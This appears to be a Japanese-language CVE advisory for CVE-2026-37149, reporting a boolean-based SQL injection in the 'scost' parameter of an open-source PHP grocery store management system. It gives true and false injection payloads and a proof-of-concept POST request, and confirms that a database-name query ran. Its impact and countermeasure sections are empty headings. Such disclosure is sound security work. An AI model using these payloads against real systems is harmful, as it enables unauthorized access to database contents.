
CVE-2026-37149 - GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0 の search_products.php の scost パラメータにおけるSQLインジェクションの脆弱性
CVE-2026-37149 SQLインジェクション in GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0
概要
CVE ID: CVE-2026-37149
脆弱性タイプ: SQLインジェクション (CWE-89)
重要度: 高
発見者: Dhyey Patel
説明
GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0 には、"/grocery/search_products.php" の "scost" パラメータにSQLインジェクションの脆弱性が存在します。
アプリケーションは、ユーザーからの入力をSQLクエリに埋め込む前に適切に検証していません。攻撃者は脆弱なパラメータを通じて細工されたSQL式を注入し、バックエンドのデータベースクエリを操作できます。
悪用に成功すると、機密データベース情報への不正アクセスや任意のSQL文の実行が可能となります。
影響を受ける製品
製品: GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN
バージョン: v1.0
ベンダーリポジトリ:
https://github.com/anirudhkannanvp/GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN-
影響を受けるコンポーネント
攻撃タイプ
リモート
ベンダー情報
リポジトリ所有者によって維持されているオープンソースプロジェクト:
https://github.com/anirudhkannanvp
技術的詳細
この脆弱性は、ブールベースのSQLインジェクション手法を用いて確認されました。
真条件ペイロード
-1 OR 321=6 AND 000483=000483 --
偽条件ペイロード
-1 OR 320=6 AND 000483=000483 --
注入された条件がTRUEまたはFALSEと評価された場合にアプリケーションの応答が異なり、SQLインジェクションが確認されました。
さらにテストを実施し、以下のSQL関数の実行に成功しました:
SELECT database()
返されたデータベース名:
grocery
これは、脆弱なパラメータを通じて任意のSQLクエリが実行可能であることを示しています。
概念実証
リクエスト
POST /grocery/search_products.php HTTP/1.1 Host: localhost X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded
scategory=1& scost=-1 OR 321=6 AND 000483=000483 -- & sitem_name=test& spid=1& submit=Search%20For%20products
結果
注入されたブール条件に応じて応答が変化し、"scost" パラメータにおけるSQLインジェクションが確認されました。
影響
潜在的な影響は以下の通りです:
対策
開発者は以下の対策を実施すべきです:
参考文献
OWASP SQLインジェクション
https://owasp.org/www-community/attacks/SQL_Injection
MITRE CVEプログラム
https://www.cve.org
クレジット
発見および報告者:
Dhyey Patel